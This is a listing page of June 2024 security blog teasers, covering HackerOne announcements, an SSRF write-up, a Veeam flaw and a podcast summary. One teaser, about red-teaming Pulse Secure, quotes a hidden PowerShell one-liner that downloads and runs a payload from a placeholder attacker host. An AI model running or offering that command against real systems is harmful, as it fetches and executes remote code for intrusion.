Category: Mix

Hackerone logo
14
Jun
2024

HackerOne’s Cloud Security Capabilities for AWS Customers 

HackerOne provides security capabilities for AWS customers looking to improve security in their cloud applications. These include vulnerability pentests specific…

Hackerone logo
14
Jun
2024

What HackerOne Customers Can Tell You About Securing Organizational Buy-In for Ethical Hackers

Securing Organizational Buy-in For Ethical Hackers CISOs and other security leaders are challenged to demonstrate the benefits of working with…

Piercing the Veil: Server Side Request Forgery to NIPRNet access | by Alyssa Herrera
13
Jun
2024

Piercing the Veil: Server Side Request Forgery to NIPRNet access | by Alyssa Herrera

The second Jira website I discovered was surprisingly harder to exploit. It didn’t give me the verbose errors like the…

Hacking Pulse Secure for Redteaming
12
Jun
2024

Hacking Pulse Secure for Redteaming

The code we used for the batch script is below. @echo off powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://your-ip/payload))”…

Sub-Venture Scale Security Problems
12
Jun
2024

Sub-Venture Scale Security Problems

Thank you to Kane for coming up with the main thesis and as primary author of this piece. Check out…

Launching new domains view and enhanced policies
12
Jun
2024

Launching new domains view and enhanced policies

We’ve recently announced a new Domains page and major improvements to existing capabilities for setting custom attack surface policies. These…

Vulnerability detected on Veeam Backup Enterprise Manager
10
Jun
2024

Vulnerability detected on Veeam Backup Enterprise Manager

On May 21, 2024, Veeam revealed a severe flaw across its Veeam Backup Enterprise Manager (VBEM) web interface that enables…

Hackerone logo
07
Jun
2024

Hack My Career: Advice from HackerOne Employees

Today, we gathered insights from five HackerOne employees offering career advice to illuminate this journey and provide guidance. Kayla Underkoffler,…

Hackerone logo
06
Jun
2024

NIST CSF 2.0 and Pentesting: What You Need to Know

In 2014, the National Institute of Standards and Technology (NIST), recognizing the importance of protecting U.S. systems and data against cyberattack, issued…

Hackerone logo
06
Jun
2024

HackerOne Company Values Matter: Execute with Excellence

Since its inception, the Execute with Excellence Award has had three remarkable recipients. Each one shares a unique perspective on…

Podcast Summary: Dwarkesh vs. Leopold Aschenbrenner
05
Jun
2024

Podcast Summary: Dwarkesh vs. Leopold Aschenbrenner

This is a Fabric conversation extraction (using the extract_wisdom_dm pattern) of the 4-hour conversation between Dwarkesh and Leopold about AGI…

Cybersecurity: Why ROI Isn’t Always a Meaningful Metric
04
Jun
2024

Cybersecurity: Why ROI Isn’t Always a Meaningful Metric

Cybersecurity investments are crucial for businesses of all sizes, but determining the return on investment (ROI) of these investments can…